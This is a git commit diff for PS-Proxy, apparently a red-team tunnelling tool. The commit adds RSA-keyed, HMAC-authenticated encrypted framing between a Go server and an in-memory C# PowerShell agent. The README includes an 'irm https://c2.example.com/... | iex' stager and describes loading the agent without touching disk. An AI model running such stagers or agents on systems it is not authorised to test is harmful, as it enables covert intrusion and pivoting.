mirror of
https://github.com/Harrison-Wells-Cyber/PS-Proxy
synced 2026-07-26 08:06:34 +00:00
Add application-layer tunnel encryption
This commit is contained in:
@@ -23,9 +23,9 @@ administrator privileges on the Windows agent host.
|
|||||||
- **Enrollment:** the server creates a short-lived one-time staging URL. The
|
- **Enrollment:** the server creates a short-lived one-time staging URL. The
|
||||||
generated agent script contains an enrollment token rather than a long-term
|
generated agent script contains an enrollment token rather than a long-term
|
||||||
PSK.
|
PSK.
|
||||||
- **TLS:** server certificate pinning is mandatory for the agent. The C# core
|
- **Trust anchor:** TLS is transport and staging only. The agent pins the stable
|
||||||
refuses to continue unless the presented server certificate matches the pinned
|
PS-Proxy application identity public key and establishes an authenticated
|
||||||
SHA-256 DER hash.
|
encrypted tunnel inside TLS before enrollment tokens or tunnel frames are sent.
|
||||||
- **Disk behavior:** release agents do not use `Add-Type`, do not invoke
|
- **Disk behavior:** release agents do not use `Add-Type`, do not invoke
|
||||||
`csc.exe` on the target, and do not intentionally write the managed agent DLL
|
`csc.exe` on the target, and do not intentionally write the managed agent DLL
|
||||||
to disk. The embedded DLL is loaded with
|
to disk. The embedded DLL is loaded with
|
||||||
@@ -87,8 +87,11 @@ explicitly with `--agent-assembly-b64-file`.
|
|||||||
|
|
||||||
## Start the server with transparent TCP routing
|
## Start the server with transparent TCP routing
|
||||||
|
|
||||||
Use a real certificate whose leaf DER hash will be pinned by the agent. On the
|
Use a real certificate for HTTPS transport/staging. PS-Proxy will create or reuse
|
||||||
Linux server, run as root so PS-Proxy can install and remove iptables NAT rules:
|
`psproxy_identity.pem` as the application-layer trust anchor; keep this file
|
||||||
|
stable across server restarts and redeployments so existing staged agents trust
|
||||||
|
the same server identity. On the Linux server, run as root so PS-Proxy can
|
||||||
|
install and remove iptables NAT rules:
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
sudo ./psproxy-server \
|
sudo ./psproxy-server \
|
||||||
@@ -114,9 +117,10 @@ The server prints a one-time command:
|
|||||||
irm https://c2.example.com/a/<one-time-id> | iex
|
irm https://c2.example.com/a/<one-time-id> | iex
|
||||||
```
|
```
|
||||||
|
|
||||||
The generated script auto-starts, loads the embedded C# core in memory, validates
|
The generated script auto-starts, loads the embedded C# core in memory, verifies
|
||||||
the pinned server certificate, enrolls with the one-time token, and switches to
|
the staged PS-Proxy identity public key with an application-layer handshake,
|
||||||
the framed tunnel protocol.
|
sends enrollment inside the encrypted/authenticated tunnel, and then uses that
|
||||||
|
protected tunnel for all framed TCP and DNS relay traffic.
|
||||||
|
|
||||||
## Optional fixed-target developer TCP relay
|
## Optional fixed-target developer TCP relay
|
||||||
|
|
||||||
@@ -151,8 +155,15 @@ connections during high-concurrency tools such as NetExec; the default is 256. W
|
|||||||
- Use HTTPS staging. Plain HTTP `irm | iex` is mechanically possible, but it is
|
- Use HTTPS staging. Plain HTTP `irm | iex` is mechanically possible, but it is
|
||||||
not acceptable for sensitive environments because staging tampering means code
|
not acceptable for sensitive environments because staging tampering means code
|
||||||
execution on the Windows host.
|
execution on the Windows host.
|
||||||
- The agent pins the server certificate before enrollment or tunnel traffic.
|
- TLS is transport only; do not use the HTTPS certificate as the PS-Proxy root of trust.
|
||||||
Certificate pin mismatch is fatal.
|
- The server has a stable RSA identity key (`--identity-key`, default
|
||||||
|
`psproxy_identity.pem`). If the file is missing, the server generates a
|
||||||
|
3072-bit RSA key and logs the SHA-256 pin of the public key DER.
|
||||||
|
- Keep `psproxy_identity.pem` stable and private. Rotating it intentionally
|
||||||
|
changes the PS-Proxy trust anchor and requires staging new agents.
|
||||||
|
- The staged agent embeds the server identity public key, performs an
|
||||||
|
application-layer PSP1 handshake, verifies a server HMAC proof, and only then
|
||||||
|
sends enrollment/reconnect tokens inside encrypted authenticated frames.
|
||||||
- Enrollment URLs are short-lived and one-time use.
|
- Enrollment URLs are short-lived and one-time use.
|
||||||
- The enrollment token is placed in the HTTPS response body, not in the URL.
|
- The enrollment token is placed in the HTTPS response body, not in the URL.
|
||||||
- Do not log generated agent bodies or enrollment tokens.
|
- Do not log generated agent bodies or enrollment tokens.
|
||||||
@@ -163,30 +174,33 @@ connections during high-concurrency tools such as NetExec; the default is 256. W
|
|||||||
|
|
||||||
### TLS inspection / enterprise decryption
|
### TLS inspection / enterprise decryption
|
||||||
|
|
||||||
If an authorized enterprise TLS inspection device presents a different leaf
|
PS-Proxy now treats HTTPS/TLS as transport and staging rather than as the tunnel
|
||||||
certificate to the Windows agent than the certificate loaded by the VPS server,
|
root of trust. Enterprise TLS inspection products such as Palo Alto, Zscaler, or
|
||||||
agent certificate pinning will fail. The safest fix is to exempt the PS-Proxy
|
other decrypting proxies may present an enterprise-issued leaf certificate to the
|
||||||
server domain from TLS decryption so the agent sees the VPS certificate directly.
|
agent; this should no longer break agent/server trust because the agent verifies
|
||||||
|
the staged PS-Proxy identity public key inside the TLS connection.
|
||||||
|
|
||||||
For controlled labs where decryption cannot be bypassed, pass the inspected leaf
|
Operational guidance:
|
||||||
certificate SHA-256 DER hash explicitly:
|
|
||||||
|
|
||||||
```bash
|
- Keep using HTTPS for staging so the one-time loader is not exposed to trivial
|
||||||
--agent-cert-pin-override <64-char-sha256-hex-pin>
|
network tampering.
|
||||||
```
|
- Keep `psproxy_identity.pem` private and stable. It is the PS-Proxy identity,
|
||||||
|
and its public key pin is what identifies the legitimate server to agents.
|
||||||
Only use this when you control and trust the inspection device. This pins the
|
- Back up `psproxy_identity.pem` with the same care as other server secrets. If
|
||||||
agent to the certificate it actually sees, not the certificate file loaded by the
|
it is lost and regenerated, previously staged agents will not trust the new
|
||||||
VPS server.
|
identity unless they are restaged with the new public key.
|
||||||
|
- TLS inspection can still observe the outer HTTPS transport metadata, but it
|
||||||
|
cannot read or tamper with protected PSP1 tunnel frames after the
|
||||||
|
application-layer handshake without detection.
|
||||||
|
|
||||||
## Current implementation status
|
## Current implementation status
|
||||||
|
|
||||||
Implemented now:
|
Implemented now:
|
||||||
|
|
||||||
- Go TLS listener with mixed HTTP staging and raw agent tunnel handling.
|
- Go TLS listener with mixed HTTP staging and raw agent tunnel handling.
|
||||||
- Leaf certificate pin calculation for generated agent configuration.
|
- Stable PS-Proxy RSA identity key generation/reuse with a logged public key pin staged into generated agents.
|
||||||
- Short-lived one-time staging URLs.
|
- Short-lived one-time staging URLs.
|
||||||
- One-time enrollment token validation for the raw tunnel plus reconnect-token authentication after first enrollment.
|
- Application-layer PSP1 secure handshake before enrollment, followed by encrypted/authenticated frame transport and reconnect-token authentication after first enrollment.
|
||||||
- Agent auto-reconnect with exponential backoff for transient tunnel failures.
|
- Agent auto-reconnect with exponential backoff for transient tunnel failures.
|
||||||
- Framed multiplexed stream protocol.
|
- Framed multiplexed stream protocol.
|
||||||
- Linux transparent TCP redirect mode for direct local-tool TCP connections to routed target IPs.
|
- Linux transparent TCP redirect mode for direct local-tool TCP connections to routed target IPs.
|
||||||
|
|||||||
@@ -18,7 +18,11 @@ namespace PSProxy.Agent
|
|||||||
private const int MaxPayload = 1 << 20;
|
private const int MaxPayload = 1 << 20;
|
||||||
private readonly string server;
|
private readonly string server;
|
||||||
private readonly int port;
|
private readonly int port;
|
||||||
private readonly string certPin;
|
private readonly string serverKey;
|
||||||
|
private ulong sendSeq;
|
||||||
|
private ulong recvSeq;
|
||||||
|
private byte[] encKey;
|
||||||
|
private byte[] macKey;
|
||||||
private readonly string enrollToken;
|
private readonly string enrollToken;
|
||||||
private readonly string reconnectToken;
|
private readonly string reconnectToken;
|
||||||
private readonly string dnsTarget;
|
private readonly string dnsTarget;
|
||||||
@@ -27,15 +31,15 @@ namespace PSProxy.Agent
|
|||||||
private SslStream tls;
|
private SslStream tls;
|
||||||
private volatile bool stopping;
|
private volatile bool stopping;
|
||||||
|
|
||||||
public Tunnel(string server, int port, string certPin, string enrollToken, string reconnectToken, string dnsTarget)
|
public Tunnel(string server, int port, string serverKey, string enrollToken, string reconnectToken, string dnsTarget)
|
||||||
{
|
{
|
||||||
this.server = server;
|
this.server = server;
|
||||||
this.port = port;
|
this.port = port;
|
||||||
this.certPin = NormalizeHex(certPin);
|
this.serverKey = serverKey;
|
||||||
this.enrollToken = enrollToken;
|
this.enrollToken = enrollToken;
|
||||||
this.reconnectToken = reconnectToken ?? "";
|
this.reconnectToken = reconnectToken ?? "";
|
||||||
this.dnsTarget = dnsTarget ?? "";
|
this.dnsTarget = dnsTarget ?? "";
|
||||||
if (this.certPin.Length != 64) throw new ArgumentException("CertPin must be a SHA-256 hex string");
|
if (String.IsNullOrWhiteSpace(serverKey)) throw new ArgumentException("ServerKey is required");
|
||||||
if (String.IsNullOrWhiteSpace(enrollToken)) throw new ArgumentException("EnrollToken is required");
|
if (String.IsNullOrWhiteSpace(enrollToken)) throw new ArgumentException("EnrollToken is required");
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -70,7 +74,9 @@ namespace PSProxy.Agent
|
|||||||
using (tls = new SslStream(tcp.GetStream(), false, ValidateServerCertificate))
|
using (tls = new SslStream(tcp.GetStream(), false, ValidateServerCertificate))
|
||||||
{
|
{
|
||||||
tls.AuthenticateAsClient(server, null, SslProtocols.Tls12, false);
|
tls.AuthenticateAsClient(server, null, SslProtocols.Tls12, false);
|
||||||
WriteAscii("PSP1\nENROLL " + enrollToken + " " + reconnectToken + "\n");
|
WriteAscii("PSP1\n");
|
||||||
|
SecureHandshake();
|
||||||
|
SendFrame(new Frame(0, FramePing, Encoding.ASCII.GetBytes("ENROLL " + enrollToken + " " + reconnectToken)));
|
||||||
Frame hello = ReadFrame();
|
Frame hello = ReadFrame();
|
||||||
if (hello.Type != FramePong || Encoding.ASCII.GetString(hello.Payload) != "OK") throw new Exception("server did not accept enrollment");
|
if (hello.Type != FramePong || Encoding.ASCII.GetString(hello.Payload) != "OK") throw new Exception("server did not accept enrollment");
|
||||||
Console.Error.WriteLine("[ps-proxy] enrolled and ready");
|
Console.Error.WriteLine("[ps-proxy] enrolled and ready");
|
||||||
@@ -79,6 +85,52 @@ namespace PSProxy.Agent
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
private void SecureHandshake()
|
||||||
|
{
|
||||||
|
byte[] secret = RandomBytes(32);
|
||||||
|
byte[] nonce = RandomBytes(32);
|
||||||
|
byte[] pubDer = Convert.FromBase64String(serverKey.Trim());
|
||||||
|
byte[] encSecret;
|
||||||
|
using (var rsa = new RSACryptoServiceProvider())
|
||||||
|
{
|
||||||
|
rsa.ImportParameters(ParseRsaPublicKey(pubDer));
|
||||||
|
encSecret = rsa.Encrypt(secret, true);
|
||||||
|
}
|
||||||
|
string hello = "HELLO " + B64Url(encSecret) + " " + B64Url(nonce) + "\n";
|
||||||
|
WriteAscii(hello);
|
||||||
|
string proofLine = ReadLineAscii();
|
||||||
|
string[] parts = proofLine.Trim().Split(new char[] { ' ' }, StringSplitOptions.RemoveEmptyEntries);
|
||||||
|
if (parts.Length != 3 || parts[0] != "PROOF") throw new Exception("invalid secure handshake proof");
|
||||||
|
byte[] serverNonce = B64UrlDecode(parts[1]);
|
||||||
|
byte[] proof = B64UrlDecode(parts[2]);
|
||||||
|
byte[] expected;
|
||||||
|
using (var h = new HMACSHA256(secret))
|
||||||
|
{
|
||||||
|
expected = h.ComputeHash(Concat(Concat(Concat(Concat(Encoding.ASCII.GetBytes("PSP1\n"), Encoding.ASCII.GetBytes(hello)), serverNonce), nonce), pubDer));
|
||||||
|
}
|
||||||
|
if (!ConstantTimeEquals(proof, expected)) throw new Exception("secure handshake proof mismatch");
|
||||||
|
using (var sha = SHA256.Create())
|
||||||
|
{
|
||||||
|
encKey = sha.ComputeHash(Concat(secret, Encoding.ASCII.GetBytes("psproxy aes-cbc")));
|
||||||
|
macKey = sha.ComputeHash(Concat(secret, Encoding.ASCII.GetBytes("psproxy hmac")));
|
||||||
|
}
|
||||||
|
sendSeq = 0; recvSeq = 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
private string ReadLineAscii()
|
||||||
|
{
|
||||||
|
var ms = new MemoryStream();
|
||||||
|
while (true)
|
||||||
|
{
|
||||||
|
int b = tls.ReadByte();
|
||||||
|
if (b < 0) throw new EndOfStreamException();
|
||||||
|
ms.WriteByte((byte)b);
|
||||||
|
if (b == '\n') return Encoding.ASCII.GetString(ms.ToArray());
|
||||||
|
if (ms.Length > 8192) throw new IOException("line too long");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
private void ReadLoop()
|
private void ReadLoop()
|
||||||
{
|
{
|
||||||
while (!stopping)
|
while (!stopping)
|
||||||
@@ -191,26 +243,65 @@ namespace PSProxy.Agent
|
|||||||
{
|
{
|
||||||
if (f.Payload == null) f.Payload = new byte[0];
|
if (f.Payload == null) f.Payload = new byte[0];
|
||||||
if (f.Payload.Length > MaxPayload) throw new InvalidOperationException("frame payload too large");
|
if (f.Payload.Length > MaxPayload) throw new InvalidOperationException("frame payload too large");
|
||||||
byte[] hdr = new byte[13];
|
byte[] plainFrame = EncodePlainFrame(f);
|
||||||
WriteU64BE(hdr, 0, f.StreamID);
|
byte[] seq = U64BE(sendSeq);
|
||||||
hdr[8] = f.Type;
|
byte[] plain = Concat(seq, plainFrame);
|
||||||
WriteI32BE(hdr, 9, f.Payload.Length);
|
byte[] padded = Pkcs7Pad(plain, 16);
|
||||||
|
byte[] iv = RandomBytes(16);
|
||||||
|
byte[] ct;
|
||||||
|
using (var aes = Aes.Create())
|
||||||
|
{
|
||||||
|
aes.Mode = CipherMode.CBC; aes.Padding = PaddingMode.None; aes.Key = encKey; aes.IV = iv;
|
||||||
|
using (var enc = aes.CreateEncryptor()) { ct = enc.TransformFinalBlock(padded, 0, padded.Length); }
|
||||||
|
}
|
||||||
|
byte[] body = Concat(iv, ct);
|
||||||
|
byte[] tag;
|
||||||
|
using (var h = new HMACSHA256(macKey)) { tag = h.ComputeHash(Concat(seq, body)); }
|
||||||
|
byte[] rec = Concat(body, tag);
|
||||||
|
byte[] len = new byte[4]; WriteI32BE(len, 0, rec.Length);
|
||||||
lock (sendLock)
|
lock (sendLock)
|
||||||
{
|
{
|
||||||
tls.Write(hdr, 0, hdr.Length);
|
tls.Write(len, 0, len.Length); tls.Write(rec, 0, rec.Length); tls.Flush();
|
||||||
if (f.Payload.Length > 0) tls.Write(f.Payload, 0, f.Payload.Length);
|
sendSeq++;
|
||||||
tls.Flush();
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
private Frame ReadFrame()
|
private Frame ReadFrame()
|
||||||
{
|
{
|
||||||
byte[] hdr = ReadExact(13);
|
int len = ReadI32BE(ReadExact(4), 0);
|
||||||
ulong sid = ReadU64BE(hdr, 0);
|
if (len < 48 || len > MaxPayload + 1024) throw new IOException("invalid secure record length: " + len);
|
||||||
byte typ = hdr[8];
|
byte[] rec = ReadExact(len);
|
||||||
int len = ReadI32BE(hdr, 9);
|
byte[] body = Slice(rec, 0, len - 32);
|
||||||
if (len < 0 || len > MaxPayload) throw new IOException("frame payload too large: " + len);
|
byte[] tag = Slice(rec, len - 32, 32);
|
||||||
return new Frame(sid, typ, len == 0 ? new byte[0] : ReadExact(len));
|
byte[] seq = U64BE(recvSeq);
|
||||||
|
byte[] expected;
|
||||||
|
using (var h = new HMACSHA256(macKey)) { expected = h.ComputeHash(Concat(seq, body)); }
|
||||||
|
if (!ConstantTimeEquals(tag, expected)) throw new IOException("secure frame authentication failed");
|
||||||
|
byte[] iv = Slice(body, 0, 16); byte[] ct = Slice(body, 16, body.Length - 16); byte[] pt;
|
||||||
|
using (var aes = Aes.Create())
|
||||||
|
{
|
||||||
|
aes.Mode = CipherMode.CBC; aes.Padding = PaddingMode.None; aes.Key = encKey; aes.IV = iv;
|
||||||
|
using (var dec = aes.CreateDecryptor()) { pt = dec.TransformFinalBlock(ct, 0, ct.Length); }
|
||||||
|
}
|
||||||
|
pt = Pkcs7Unpad(pt, 16);
|
||||||
|
ulong gotSeq = ReadU64BE(pt, 0);
|
||||||
|
if (gotSeq != recvSeq) throw new IOException("secure frame sequence mismatch");
|
||||||
|
recvSeq++;
|
||||||
|
return DecodePlainFrame(Slice(pt, 8, pt.Length - 8));
|
||||||
|
}
|
||||||
|
|
||||||
|
private byte[] EncodePlainFrame(Frame f)
|
||||||
|
{
|
||||||
|
byte[] b = new byte[13 + f.Payload.Length];
|
||||||
|
WriteU64BE(b, 0, f.StreamID); b[8] = f.Type; WriteI32BE(b, 9, f.Payload.Length);
|
||||||
|
Buffer.BlockCopy(f.Payload, 0, b, 13, f.Payload.Length); return b;
|
||||||
|
}
|
||||||
|
|
||||||
|
private Frame DecodePlainFrame(byte[] b)
|
||||||
|
{
|
||||||
|
if (b.Length < 13) throw new IOException("frame too short");
|
||||||
|
int len = ReadI32BE(b, 9); if (len < 0 || len > MaxPayload || b.Length != 13 + len) throw new IOException("invalid frame length");
|
||||||
|
return new Frame(ReadU64BE(b, 0), b[8], Slice(b, 13, len));
|
||||||
}
|
}
|
||||||
|
|
||||||
private byte[] ReadExact(int n)
|
private byte[] ReadExact(int n)
|
||||||
@@ -235,13 +326,8 @@ namespace PSProxy.Agent
|
|||||||
|
|
||||||
private bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
|
private bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
|
||||||
{
|
{
|
||||||
var cert2 = new X509Certificate2(certificate);
|
// TLS is transport/staging only. PS-Proxy server identity is verified by SecureHandshake.
|
||||||
using (var sha = SHA256.Create())
|
return true;
|
||||||
{
|
|
||||||
string got = BitConverter.ToString(sha.ComputeHash(cert2.RawData)).Replace("-", "").ToLowerInvariant();
|
|
||||||
if (got != certPin) { Console.Error.WriteLine("[ps-proxy] cert pin mismatch: " + got); return false; }
|
|
||||||
}
|
|
||||||
return sslPolicyErrors == SslPolicyErrors.None;
|
|
||||||
}
|
}
|
||||||
|
|
||||||
private static void SplitTarget(string target, out string host, out int dstPort)
|
private static void SplitTarget(string target, out string host, out int dstPort)
|
||||||
@@ -264,7 +350,35 @@ namespace PSProxy.Agent
|
|||||||
client.EndConnect(ar);
|
client.EndConnect(ar);
|
||||||
}
|
}
|
||||||
|
|
||||||
private static string NormalizeHex(string s) { return (s ?? "").Trim().ToLowerInvariant().Replace(":", "").Replace(" ", ""); }
|
|
||||||
|
private static byte[] RandomBytes(int n) { byte[] b = new byte[n]; using (var rng = RandomNumberGenerator.Create()) { rng.GetBytes(b); } return b; }
|
||||||
|
private static byte[] Concat(byte[] a, byte[] b) { byte[] o = new byte[a.Length + b.Length]; Buffer.BlockCopy(a,0,o,0,a.Length); Buffer.BlockCopy(b,0,o,a.Length,b.Length); return o; }
|
||||||
|
private static byte[] Slice(byte[] b, int o, int n) { byte[] r = new byte[n]; Buffer.BlockCopy(b,o,r,0,n); return r; }
|
||||||
|
private static byte[] U64BE(ulong v) { byte[] b = new byte[8]; WriteU64BE(b,0,v); return b; }
|
||||||
|
private static string B64Url(byte[] b) { return Convert.ToBase64String(b).TrimEnd('=').Replace('+','-').Replace('/','_'); }
|
||||||
|
private static byte[] B64UrlDecode(string s) { string t = s.Replace('-','+').Replace('_','/'); while (t.Length % 4 != 0) t += "="; return Convert.FromBase64String(t); }
|
||||||
|
private static bool ConstantTimeEquals(byte[] a, byte[] b) { if (a == null || b == null || a.Length != b.Length) return false; int d = 0; for (int i=0;i<a.Length;i++) d |= a[i]^b[i]; return d == 0; }
|
||||||
|
private static byte[] Pkcs7Pad(byte[] b, int block) { int pad = block - (b.Length % block); byte[] o = new byte[b.Length + pad]; Buffer.BlockCopy(b,0,o,0,b.Length); for (int i=b.Length;i<o.Length;i++) o[i]=(byte)pad; return o; }
|
||||||
|
private static byte[] Pkcs7Unpad(byte[] b, int block) { if (b.Length == 0 || b.Length % block != 0) throw new IOException("invalid padding"); int p = b[b.Length-1]; if (p < 1 || p > block || p > b.Length) throw new IOException("invalid padding"); for (int i=b.Length-p;i<b.Length;i++) if (b[i] != p) throw new IOException("invalid padding"); return Slice(b,0,b.Length-p); }
|
||||||
|
private static RSAParameters ParseRsaPublicKey(byte[] spki)
|
||||||
|
{
|
||||||
|
int o = 0;
|
||||||
|
int spkiEnd = BeginTLV(spki, ref o, 0x30);
|
||||||
|
int algEnd = BeginTLV(spki, ref o, 0x30);
|
||||||
|
o = algEnd;
|
||||||
|
byte[] bit = ReadTLV(spki, ref o, 0x03);
|
||||||
|
if (o != spkiEnd || bit.Length < 1 || bit[0] != 0) throw new CryptographicException("invalid public key");
|
||||||
|
o = 1;
|
||||||
|
int rsaEnd = BeginTLV(bit, ref o, 0x30);
|
||||||
|
byte[] mod = ReadTLV(bit, ref o, 0x02);
|
||||||
|
byte[] exp = ReadTLV(bit, ref o, 0x02);
|
||||||
|
if (o != rsaEnd) throw new CryptographicException("invalid public key");
|
||||||
|
if (mod.Length > 1 && mod[0] == 0) mod = Slice(mod, 1, mod.Length - 1);
|
||||||
|
return new RSAParameters { Modulus = mod, Exponent = exp };
|
||||||
|
}
|
||||||
|
private static int BeginTLV(byte[] b, ref int o, int tag) { if (o >= b.Length || b[o++] != tag) throw new CryptographicException("asn1 tag"); int len = ReadLen(b, ref o); if (len < 0 || o + len > b.Length) throw new CryptographicException("asn1 len"); int end = o + len; return end; }
|
||||||
|
private static byte[] ReadTLV(byte[] b, ref int o, int tag) { int end = BeginTLV(b, ref o, tag); byte[] v = Slice(b, o, end - o); o = end; return v; }
|
||||||
|
private static int ReadLen(byte[] b, ref int o) { if (o >= b.Length) throw new CryptographicException("asn1 len"); int v = b[o++]; if ((v & 0x80) == 0) return v; int n = v & 0x7f; if (n < 1 || n > 4 || o + n > b.Length) throw new CryptographicException("asn1 len"); int len = 0; for (int i = 0; i < n; i++) len = (len << 8) | b[o++]; return len; }
|
||||||
private static void WriteI32BE(byte[] b, int o, int v) { b[o] = (byte)(v >> 24); b[o + 1] = (byte)(v >> 16); b[o + 2] = (byte)(v >> 8); b[o + 3] = (byte)v; }
|
private static void WriteI32BE(byte[] b, int o, int v) { b[o] = (byte)(v >> 24); b[o + 1] = (byte)(v >> 16); b[o + 2] = (byte)(v >> 8); b[o + 3] = (byte)v; }
|
||||||
private static int ReadI32BE(byte[] b, int o) { return ((int)b[o] << 24) | ((int)b[o + 1] << 16) | ((int)b[o + 2] << 8) | (int)b[o + 3]; }
|
private static int ReadI32BE(byte[] b, int o) { return ((int)b[o] << 24) | ((int)b[o + 1] << 16) | ((int)b[o + 2] << 8) | (int)b[o + 3]; }
|
||||||
private static void WriteU64BE(byte[] b, int o, ulong v) { for (int i = 7; i >= 0; i--) { b[o + i] = (byte)v; v >>= 8; } }
|
private static void WriteU64BE(byte[] b, int o, ulong v) { for (int i = 7; i >= 0; i--) { b[o + i] = (byte)v; v >>= 8; } }
|
||||||
|
|||||||
@@ -2,7 +2,7 @@
|
|||||||
param(
|
param(
|
||||||
[string]$Server = "{{.Server}}",
|
[string]$Server = "{{.Server}}",
|
||||||
[int]$Port = {{.Port}},
|
[int]$Port = {{.Port}},
|
||||||
[string]$CertPin = "{{.CertPin}}",
|
[string]$ServerKey = "{{.ServerKey}}",
|
||||||
[string]$EnrollToken = "{{.EnrollToken}}",
|
[string]$EnrollToken = "{{.EnrollToken}}",
|
||||||
[string]$ReconnectToken = "{{.ReconnectToken}}",
|
[string]$ReconnectToken = "{{.ReconnectToken}}",
|
||||||
[string]$DNSTarget = "{{.DNSTarget}}",
|
[string]$DNSTarget = "{{.DNSTarget}}",
|
||||||
@@ -30,13 +30,13 @@ function Start-PSTunnel {
|
|||||||
param(
|
param(
|
||||||
[Parameter(Mandatory=$true)][string]$Server,
|
[Parameter(Mandatory=$true)][string]$Server,
|
||||||
[int]$Port = 443,
|
[int]$Port = 443,
|
||||||
[Parameter(Mandatory=$true)][string]$CertPin,
|
[Parameter(Mandatory=$true)][string]$ServerKey,
|
||||||
[Parameter(Mandatory=$true)][string]$EnrollToken,
|
[Parameter(Mandatory=$true)][string]$EnrollToken,
|
||||||
[string]$ReconnectToken = "",
|
[string]$ReconnectToken = "",
|
||||||
[string]$DNSTarget = ""
|
[string]$DNSTarget = ""
|
||||||
)
|
)
|
||||||
if (-not ("PSProxy.Agent.Tunnel" -as [type])) { Import-PSProxyAgentAssembly }
|
if (-not ("PSProxy.Agent.Tunnel" -as [type])) { Import-PSProxyAgentAssembly }
|
||||||
$t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken, $ReconnectToken, $DNSTarget)
|
$t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $ServerKey, $EnrollToken, $ReconnectToken, $DNSTarget)
|
||||||
$t.Run()
|
$t.Run()
|
||||||
}
|
}
|
||||||
if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken -ReconnectToken $ReconnectToken -DNSTarget $DNSTarget }
|
if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -ServerKey $ServerKey -EnrollToken $EnrollToken -ReconnectToken $ReconnectToken -DNSTarget $DNSTarget }
|
||||||
|
|||||||
+126
-49
@@ -2,8 +2,13 @@ package main
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"bufio"
|
"bufio"
|
||||||
|
"crypto/hmac"
|
||||||
|
"crypto/rand"
|
||||||
|
"crypto/rsa"
|
||||||
"crypto/sha256"
|
"crypto/sha256"
|
||||||
"crypto/tls"
|
"crypto/tls"
|
||||||
|
"crypto/x509"
|
||||||
|
"encoding/base64"
|
||||||
"encoding/hex"
|
"encoding/hex"
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"encoding/pem"
|
"encoding/pem"
|
||||||
@@ -34,7 +39,7 @@ func main() {
|
|||||||
port := flag.Int("port", 443, "TLS listener port")
|
port := flag.Int("port", 443, "TLS listener port")
|
||||||
cert := flag.String("cert", "", "TLS fullchain PEM; defaults to /etc/letsencrypt/live/<domain>/fullchain.pem")
|
cert := flag.String("cert", "", "TLS fullchain PEM; defaults to /etc/letsencrypt/live/<domain>/fullchain.pem")
|
||||||
key := flag.String("key", "", "TLS private key PEM; defaults to /etc/letsencrypt/live/<domain>/privkey.pem")
|
key := flag.String("key", "", "TLS private key PEM; defaults to /etc/letsencrypt/live/<domain>/privkey.pem")
|
||||||
agentCertPinOverride := flag.String("agent-cert-pin-override", "", "override SHA-256 DER certificate pin embedded in staged agents; use only when an authorized TLS inspection device presents a different leaf cert")
|
identityKeyPath := flag.String("identity-key", "psproxy_identity.pem", "stable RSA identity private key PEM for PS-Proxy application-layer tunnel trust")
|
||||||
tun := flag.String("tun", "psproxy0", "TUN interface name for the planned netstack data plane")
|
tun := flag.String("tun", "psproxy0", "TUN interface name for the planned netstack data plane")
|
||||||
agentTemplate := flag.String("agent-template", "agent/loader/agent.ps1.tmpl", "PowerShell agent loader template")
|
agentTemplate := flag.String("agent-template", "agent/loader/agent.ps1.tmpl", "PowerShell agent loader template")
|
||||||
agentAssemblyFile := flag.String("agent-assembly-b64-file", "", "file containing compressed/base64 PSProxy.Agent.dll; defaults to release/agent_assembly.b64 when present")
|
agentAssemblyFile := flag.String("agent-assembly-b64-file", "", "file containing compressed/base64 PSProxy.Agent.dll; defaults to release/agent_assembly.b64 when present")
|
||||||
@@ -71,16 +76,13 @@ func main() {
|
|||||||
if err := validateRoutes(routes); err != nil {
|
if err := validateRoutes(routes); err != nil {
|
||||||
log.Fatal(err)
|
log.Fatal(err)
|
||||||
}
|
}
|
||||||
pin, err := certPin(*cert)
|
identityKey, err := loadOrCreateIdentityKey(*identityKeyPath)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
log.Fatalf("certificate pin failed: %v", err)
|
log.Fatalf("identity key load failed: %v", err)
|
||||||
}
|
}
|
||||||
if *agentCertPinOverride != "" {
|
serverKey, identityPin, err := publicKeyStaging(identityKey)
|
||||||
pin, err = normalizeCertPin(*agentCertPinOverride)
|
if err != nil {
|
||||||
if err != nil {
|
log.Fatalf("identity public key encode failed: %v", err)
|
||||||
log.Fatalf("invalid --agent-cert-pin-override: %v", err)
|
|
||||||
}
|
|
||||||
log.Printf("WARNING: using operator-supplied agent certificate pin override")
|
|
||||||
}
|
}
|
||||||
assembly, err := loadAssemblyB64(*agentAssemblyFile)
|
assembly, err := loadAssemblyB64(*agentAssemblyFile)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
@@ -91,11 +93,12 @@ func main() {
|
|||||||
}
|
}
|
||||||
tmpl := template.Must(template.ParseFiles(*agentTemplate))
|
tmpl := template.Must(template.ParseFiles(*agentTemplate))
|
||||||
store := staging.NewStore(*ttl)
|
store := staging.NewStore(*ttl)
|
||||||
sess, err := store.Create(*domain, *port, pin, *dnsTarget)
|
sess, err := store.Create(*domain, *port, serverKey, *dnsTarget)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
log.Fatal(err)
|
log.Fatal(err)
|
||||||
}
|
}
|
||||||
server := NewTunnelServer(store, *maxStreams)
|
server := NewTunnelServer(store, *maxStreams)
|
||||||
|
server.identityKey = identityKey
|
||||||
mux := http.NewServeMux()
|
mux := http.NewServeMux()
|
||||||
mux.HandleFunc("GET /a/{id}", staging.AgentHandler(store, tmpl, assembly))
|
mux.HandleFunc("GET /a/{id}", staging.AgentHandler(store, tmpl, assembly))
|
||||||
mux.HandleFunc("GET /healthz", func(w http.ResponseWriter, r *http.Request) { _, _ = w.Write([]byte("ok\n")) })
|
mux.HandleFunc("GET /healthz", func(w http.ResponseWriter, r *http.Request) { _, _ = w.Write([]byte("ok\n")) })
|
||||||
@@ -116,7 +119,8 @@ func main() {
|
